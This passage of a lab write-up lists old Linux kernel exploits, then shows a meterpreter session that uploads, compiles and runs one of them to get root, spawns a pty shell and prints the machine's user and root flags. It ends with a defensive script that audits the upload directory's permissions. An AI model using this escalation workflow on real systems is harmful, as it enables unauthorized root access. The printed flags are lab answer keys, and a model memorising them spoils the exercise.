Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)                                                                                  | exploits/linux/dos/31965.c
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)                                                                                  | exploits/linux/dos/31966.c
Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - 'ptrace_attach' Local Privilege Escalation                                                                                    | exploits/linux/local/8673.c
Linux Kernel 2.6.x (Sparc64) - '/proc/iomem' Local Denial of Service                                                                                                  | exploits/linux/dos/33043.txt
Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service                                                                                               | exploits/linux_x86-64/dos/33585.txt
Linux Kernel 2.6.x - '/drivers/net/r8169.c' Out-of-IOMMU Error Local Denial of Service                                                                                | exploits/linux/dos/33289.txt
Linux Kernel 2.6.x - 'AIO_Free_Ring' Local Denial of Service                                                                                                          | exploits/linux/dos/24804.c
Linux Kernel 2.6.x - 'ISO9660' Denial of Service                                                                                                                      | exploits/linux/dos/28912.txt
Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation (1)                                                                         | exploits/linux/local/25202.c
Linux Kernel 2.6.x - 'add_to_page_cache_lru()' Local Denial of Service                                                                                                | exploits/linux/dos/32384.txt
Linux Kernel 2.6.x - 'drivers/char/tty_ldisc.c' Null Pointer Dereference Denial of Service                                                                            | exploits/linux/dos/33193.c
Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service                                                                                        | exploits/linux/dos/10017.c
Linux Kernel 2.6.x - 'inotify_init()' Memory Leak Local Denial of Service                                                                                             | exploits/linux/dos/35013.c
Linux Kernel 2.6.x - 'inotify_init1()' Double-Free Local Denial of Service                                                                                            | exploits/linux/dos/35600.c
Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service                                                                                                     | exploits/linux/dos/32775.txt
Linux Kernel 2.6.x - 'net/core/filter.c' Local Information Disclosure                                                                                                 | exploits/linux/local/34987.c
Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' Null Pointer Dereference Denial of Service                                                                               | exploits/linux/dos/33635.c
Linux Kernel 2.6.x - 'pipe.c' Local Privilege Escalation (2)                                                                                                          | exploits/linux/local/33322.c
Linux Kernel 2.6.x - 'posix-timers.c' Null Pointer Dereference Denial of Service                                                                                      | exploits/linux/dos/33148.c
Linux Kernel 2.6.x - 'qdisc_run()' Local Denial of Service                                                                                                            | exploits/linux/dos/32682.c
Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure                                                                                                     | exploits/linux/local/37543.c
Linux Kernel 2.6.x - 'seccomp' System Call Security Bypass                                                                                                            | exploits/linux/local/32829.c
Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure                                                                                              | exploits/linux/local/32805.c
Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service                                                                                                  | exploits/linux/dos/33015.c
Linux Kernel 2.6.x - 'sys_timer_create()' Local Denial of Service                                                                                                     | exploits/linux/dos/1657.asm
Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure                                                                                       | exploits/linux/local/30605.c
Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service                                                                                               | exploits/linux/dos/29826.txt
Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service                                                                                                         | exploits/linux/dos/29683.txt
Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass                                                                                                                | exploits/linux/local/34001.c
Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass                                                                                                          | exploits/linux/local/27769.txt
Linux Kernel 2.6.x - Cloned Process 'CLONE_PARENT' Local Origin Validation                                                                                            | exploits/linux/dos/32815.c
Linux Kernel 2.6.x - Cryptoloop Information Disclosure                                                                                                                | exploits/linux/local/25707.txt
Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation                                                                                                   | exploits/linux/local/33395.txt
Linux Kernel 2.6.x - File Lock Lease Local Denial of Service                                                                                                          | exploits/linux/dos/26749.c
Linux Kernel 2.6.x - INVALIDATE_INODE_PAGES2 Local Integer Overflow                                                                                                   | exploits/linux/dos/26811.c
Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote (PoC)                                                                                            | exploits/linux/dos/24696.c
Linux Kernel 2.6.x - IPv6 Local Denial of Service                                                                                                                     | exploits/linux/dos/26382.c
Linux Kernel 2.6.x - IPv6_SockGlue.c Null Pointer Dereference Denial of Service                                                                                       | exploits/linux/dos/29781.c
Linux Kernel 2.6.x - KSM Local Denial of Service                                                                                                                      | exploits/linux/dos/35820.c
Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service                                                                                                  | exploits/linux/dos/33592.txt
Linux Kernel 2.6.x - NETLINK_FIB_LOOKUP Local Denial of Service                                                                                                       | exploits/linux/dos/29916.c
Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service                                                                                            | exploits/linux/dos/27925.txt
Linux Kernel 2.6.x - Ptrace Privilege Escalation                                                                                                                      | exploits/linux/local/30604.c
Linux Kernel 2.6.x - SCSI ProcFS Denial of Service                                                                                                                    | exploits/linux/dos/26248.sh
Linux Kernel 2.6.x - SET_MEMPOLICY Local Denial of Service                                                                                                            | exploits/linux/dos/27031.c
Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass                                                                                                         | exploits/linux/local/27766.txt
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service                                                                                                           | exploits/linux/dos/28895.txt
Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service                                                                                                    | exploits/linux/dos/26489.c
Linux Kernel 2.6.x - Time_Out_Leases PrintK Local Denial of Service                                                                                                   | exploits/linux/dos/26648.c
Linux Kernel 2.6.x - VFat Compat IOCTLS Local Denial of Service                                                                                                       | exploits/linux/dos/30080.c
Linux Kernel 2.6.x - epoll Nested Structures Local Denial of Service                                                                                                  | exploits/linux/dos/35403.c
Linux Kernel 2.6.x - fs/eventpoll.c epoll Data Structure File Descriptor Local Denial of Service                                                                      | exploits/linux/dos/35404.c
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation                                                | exploits/linux/local/45516.c
Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic (Denial of Service)                                                                                | exploits/linux/dos/7091.c
Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation                                                                                                        | exploits/linux/local/4756.c
Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure                                                                                                           | exploits/linux/local/9363.c
Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service                                                                                         | exploits/linux/dos/1880.c
Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Privilege Escalation (3)                                                                                       | exploits/linux/local/9575.c
Linux Kernel < 2.6.19 (x86/x64) - 'udp_sendmsg' Local Privilege Escalation (2)                                                                                        | exploits/linux/local/9574.txt
Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak                                                                                                        | exploits/linux/local/4172.c
Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation                                                                                             | exploits/linux/local/6851.c
Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure                                                                                                               | exploits/linux/local/7618.c
Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation                                                                                                  | exploits/linux/local/33523.c
Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation                                                                                                    | exploits/linux/local/8369.sh
Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service                                                                                                         | exploits/linux/dos/9442.c
Linux Kernel < 2.6.31-rc4 - 'nfs4_proc_lock()' Denial of Service                                                                                                      | exploits/linux/dos/10202.c
Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)                                                                                                    | exploits/linux/local/9543.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1)                                                                             | exploits/linux_x86/local/15916.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2)                                                                         | exploits/linux/local/15944.c
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation                                                                              | exploits/linux/local/14814.c
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation                                                                                | exploits/linux_x86-64/local/15023.c
Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure                                                                                | exploits/linux/local/15150.c
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation                                                                                  | exploits/linux/local/17787.c
Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation                                                                                           | exploits/linux/local/15774.c
Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2)                                                                                         | exploits/linux/dos/16952.c
Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation                                                 | exploits/linux/local/718.c
Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution                                                                                                             | exploits/multiple/remote/38454.py
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege Escalation                                                                        | exploits/linux/local/12130.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

I picked out a handful of these to test, roughly 10 in all, and found one exp that escalated privileges, which gave me both the user and the root flag.

meterpreter > upload /usr/share/exploitdb/exploits/linux/local/15704.c
[*] uploading  : /usr/share/exploitdb/exploits/linux/local/15704.c -> 15704.c
[*] Uploaded -1.00 B of 9.26 KiB (-0.01%): /usr/share/exploitdb/exploits/linux/local/15704.c -> 15704.c
[*] uploaded   : /usr/share/exploitdb/exploits/linux/local/15704.c -> 15704.c
meterpreter > shell
Process 3057 created.
Channel 24 created.
gcc 15704.c -o exp7
ls -la
total 492
drwxrwxrwx  2 www-data www-data  4096 Feb  2 13:55 .
drwxr-xr-x 15 www-data www-data  4096 Feb  2 10:49 ..
-rw-r--r--  1 www-data www-data 30689 Feb  2 10:13 0b2932414e4e41e18008918ba6219201142c21d0.php
-rw-r--r--  1 www-data www-data  6381 Feb  2 10:03 0b2932414e4e41e18008918ba6219201142c21d0.png
-rw-r--r--  1 www-data www-data 15608 Feb  2 13:36 14814.c
-rw-r--r--  1 www-data www-data 25298 Feb  2 13:41 15024.c
-rw-r--r--  1 www-data www-data  8835 Feb  2 13:43 15150.c
-rw-r--r--  1 www-data www-data  9487 Feb  2 13:54 15704.c
-rw-r--r--  1 www-data www-data  9204 Feb  2 13:30 15916.c
-rw-r--r--  1 www-data www-data 14922 Feb  2 13:38 17787.c
-rw-r--r--  1 www-data www-data 16153 Feb  2 13:26 33321.c
-rw-r--r--  1 www-data www-data 16587 Feb  2 13:28 40812.c
-rw-r--r--  1 www-data www-data 59294 Mar 17  2017 723bc28f9b6f924cca68ccdff96b6190566ca6b4.png
-rw-r--r--  1 www-data www-data 32060 Feb  2 11:06 a.txt
-rwxr-xr-x  1 www-data www-data 13854 Feb  2 13:27 exp1
-rwxr-xr-x  1 www-data www-data 13166 Feb  2 13:30 exp2
-rwxr-xr-x  1 www-data www-data 13819 Feb  2 13:36 exp3
-rwxr-xr-x  1 www-data www-data 23800 Feb  2 13:41 exp5
-rwxr-xr-x  1 www-data www-data 13458 Feb  2 13:44 exp6
-rwxr-xr-x  1 www-data www-data 13557 Feb  2 13:55 exp7
-rwxrwxrwx  1 www-data www-data 46631 Feb  2 11:04 le.sh
-rw-r--r--  1 www-data www-data 25304 Feb  2 11:17 lpc.py
-rw-r--r--  1 www-data www-data 33029 Jun  2  2007 noss.png
-rwxrwxrwx  1 www-data www-data   207 Feb  2 13:14 pc_shell
./exp7  
ls -la
total 492
drwxrwxrwx  2 www-data www-data  4096 Feb  2 13:55 .
drwxr-xr-x 15 www-data www-data  4096 Feb  2 10:49 ..
-rw-r--r--  1 www-data www-data 30689 Feb  2 10:13 0b2932414e4e41e18008918ba6219201142c21d0.php
-rw-r--r--  1 www-data www-data  6381 Feb  2 10:03 0b2932414e4e41e18008918ba6219201142c21d0.png
-rw-r--r--  1 www-data www-data 15608 Feb  2 13:36 14814.c
-rw-r--r--  1 www-data www-data 25298 Feb  2 13:41 15024.c
-rw-r--r--  1 www-data www-data  8835 Feb  2 13:43 15150.c
-rw-r--r--  1 www-data www-data  9487 Feb  2 13:54 15704.c
-rw-r--r--  1 www-data www-data  9204 Feb  2 13:30 15916.c
-rw-r--r--  1 www-data www-data 14922 Feb  2 13:38 17787.c
-rw-r--r--  1 www-data www-data 16153 Feb  2 13:26 33321.c
-rw-r--r--  1 www-data www-data 16587 Feb  2 13:28 40812.c
-rw-r--r--  1 www-data www-data 59294 Mar 17  2017 723bc28f9b6f924cca68ccdff96b6190566ca6b4.png
-rw-r--r--  1 www-data www-data 32060 Feb  2 11:06 a.txt
-rwxr-xr-x  1 www-data www-data 13854 Feb  2 13:27 exp1
-rwxr-xr-x  1 www-data www-data 13166 Feb  2 13:30 exp2
-rwxr-xr-x  1 www-data www-data 13819 Feb  2 13:36 exp3
-rwxr-xr-x  1 www-data www-data 23800 Feb  2 13:41 exp5
-rwxr-xr-x  1 www-data www-data 13458 Feb  2 13:44 exp6
-rwxr-xr-x  1 www-data www-data 13557 Feb  2 13:55 exp7
-rwxrwxrwx  1 www-data www-data 46631 Feb  2 11:04 le.sh
-rw-r--r--  1 www-data www-data 25304 Feb  2 11:17 lpc.py
-rw-r--r--  1 www-data www-data 33029 Jun  2  2007 noss.png
-rwxrwxrwx  1 www-data www-data   207 Feb  2 13:14 pc_shell
whoami
root
python -c 'import pty; pty.spawn("/bin/bash")'
root@popcorn:/var/www/torrent/upload# whoami
whoami
root
root@popcorn:/var/www/torrent/upload# cd /home/ 
lcd /home/
root@popcorn:/home#ls -la
ls -la
total 12
drwxr-xr-x  3 root   root   4096 Mar 17  2017 .
drwxr-xr-x 21 root   root   4096 Feb  1 11:32 ..
drwxr-xr-x  3 george george 4096 Mar 17  2017 george
root@popcorn:/home# cd george
cd george
root@popcorn:/home/george# ls -la
ls -la
total 872
drwxr-xr-x 3 george george   4096 Mar 17  2017 .
drwxr-xr-x 3 root   root     4096 Mar 17  2017 ..
-rw------- 1 root   root     2769 May  5  2017 .bash_history
-rw-r--r-- 1 george george    220 Mar 17  2017 .bash_logout
-rw-r--r-- 1 george george   3180 Mar 17  2017 .bashrc
drwxr-xr-x 2 george george   4096 Mar 17  2017 .cache
-rw------- 1 root   root     1571 Mar 17  2017 .mysql_history
-rw------- 1 root   root       19 May  5  2017 .nano_history
-rw-r--r-- 1 george george    675 Mar 17  2017 .profile
-rw-r--r-- 1 george george      0 Mar 17  2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17  2017 torrenthoster.zip
-rw-r--r-- 1 george george     33 Mar 17  2017 user.txt
root@popcorn:/home/george# cat user.txt
cat user.txt
5e36a919398ecc5d5c110f2d865cf136
root@popcorn:/home/george# cd /root
cd /root
root@popcorn:/root# ls -la
ls -la
total 40
drwx------  5 root root 4096 Apr 11  2017 .
drwxr-xr-x 21 root root 4096 Feb  1 11:32 ..
drwx------  2 root root 4096 Mar 17  2017 .aptitude
-rw-------  1 root root  637 Sep 24  2017 .bash_history
-rw-r--r--  1 root root 2227 Apr 27  2009 .bashrc
drwxr-xr-x  2 root root 4096 Mar 27  2017 .cache
drwxr-xr-x  2 root root 4096 Mar 17  2017 .debtags
-rw-------  1 root root  368 Apr 11  2017 .mysql_history
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
-rw-------  1 root root   33 Mar 17  2017 root.txt
root@popcorn:/root# cat root.txt
cat root.txt
f122331023a9393319a0370129fd9b14
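The directory listing in the session above is worth a closer look from the defender's side: `/var/www/torrent/upload` is world-writable (`drwxrwxrwx`), owned by `www-data`, and holds a `.php` file, several freshly compiled binaries and world-writable shell scripts next to the legitimate `.png` uploads. The following script is an added example, not code from the original writeup or from the Torrent Hoster project; it parses `ls -la` output in the format shown above and flags exactly those conditions. The listing embedded in it is copied from the session (shortened to the relevant entries); the web server account name `www-data` and the list of script extensions are assumptions.

```python
"""Audit an `ls -la` listing of a web upload directory for signs of abuse.

Added example (not part of the original writeup). The listing below is taken
from the session above. The audit flags what an incident responder would want
to see in an upload folder: world-writable entries, executables owned by the
web server account, and server-side script files that should never be there.
"""
import re
from dataclasses import dataclass

WEB_USER = "www-data"  # assumption: the account Apache/PHP runs as
# Assumption: extensions an interpreter or shell would run if reached.
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".sh", ".py")

# Copied from the `ls -la` output in the session above (trimmed).
LISTING = """\
total 492
drwxrwxrwx  2 www-data www-data  4096 Feb  2 13:55 .
drwxr-xr-x 15 www-data www-data  4096 Feb  2 10:49 ..
-rw-r--r--  1 www-data www-data 30689 Feb  2 10:13 0b2932414e4e41e18008918ba6219201142c21d0.php
-rw-r--r--  1 www-data www-data  6381 Feb  2 10:03 0b2932414e4e41e18008918ba6219201142c21d0.png
-rw-r--r--  1 www-data www-data  9487 Feb  2 13:54 15704.c
-rwxr-xr-x  1 www-data www-data 13557 Feb  2 13:55 exp7
-rwxrwxrwx  1 www-data www-data 46631 Feb  2 11:04 le.sh
-rw-r--r--  1 www-data www-data 25304 Feb  2 11:17 lpc.py
-rw-r--r--  1 www-data www-data 33029 Jun  2  2007 noss.png
-rwxrwxrwx  1 www-data www-data   207 Feb  2 13:14 pc_shell
"""

# One `ls -la` row: mode, link count, owner, group, size, mtime, name.
LS_LINE = re.compile(
    r"^(?P<mode>[-dlbcps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+(?P<mtime>\w{3}\s+\d{1,2}\s+(?:\d{2}:\d{2}|\d{4}))\s+(?P<name>.+)$"
)


@dataclass
class Entry:
    mode: str
    owner: str
    group: str
    size: int
    mtime: str
    name: str

    @property
    def is_dir(self) -> bool:
        return self.mode[0] == "d"

    @property
    def world_writable(self) -> bool:
        # mode[8] is the "others" write bit in the 10-character mode string
        return self.mode[8] == "w"

    @property
    def executable(self) -> bool:
        # x, s (setuid/setgid with x) or t (sticky with x) in any execute slot
        return any(c in "xst" for c in (self.mode[3], self.mode[6], self.mode[9]))


def parse_listing(text: str) -> list[Entry]:
    """Parse `ls -la` output; the 'total N' header and junk lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue
        d = m.groupdict()
        entries.append(Entry(d["mode"], d["owner"], d["group"], int(d["size"]), d["mtime"], d["name"]))
    return entries


def audit(entries: list[Entry], web_user: str = WEB_USER) -> dict[str, list[str]]:
    """Return {name: [reasons]} for every entry that violates upload-directory hygiene."""
    findings: dict[str, list[str]] = {}
    for e in entries:
        reasons = []
        if e.world_writable:
            reasons.append("world-writable " + ("directory" if e.is_dir else "file"))
        if not e.is_dir and e.executable and e.owner == web_user:
            reasons.append(f"executable owned by {web_user}")
        if e.name.lower().endswith(SCRIPT_EXTS):
            reasons.append("server-side script in upload directory")
        if reasons:
            findings[e.name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in audit(parse_listing(LISTING)).items():
        print(f"{name:50} {'; '.join(reasons)}")
```

Run against the listing, the audit reports the upload directory itself as world-writable, the hash-named `.php` file as a script where only images belong, and `exp7`, `le.sh` and `pc_shell` as executables owned by the web server account. A hardened upload directory would be owned by root with the web user allowed to write but not execute, would reject anything but the expected media extensions at upload time, and would be served with script execution disabled, so that none of these rows could appear.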

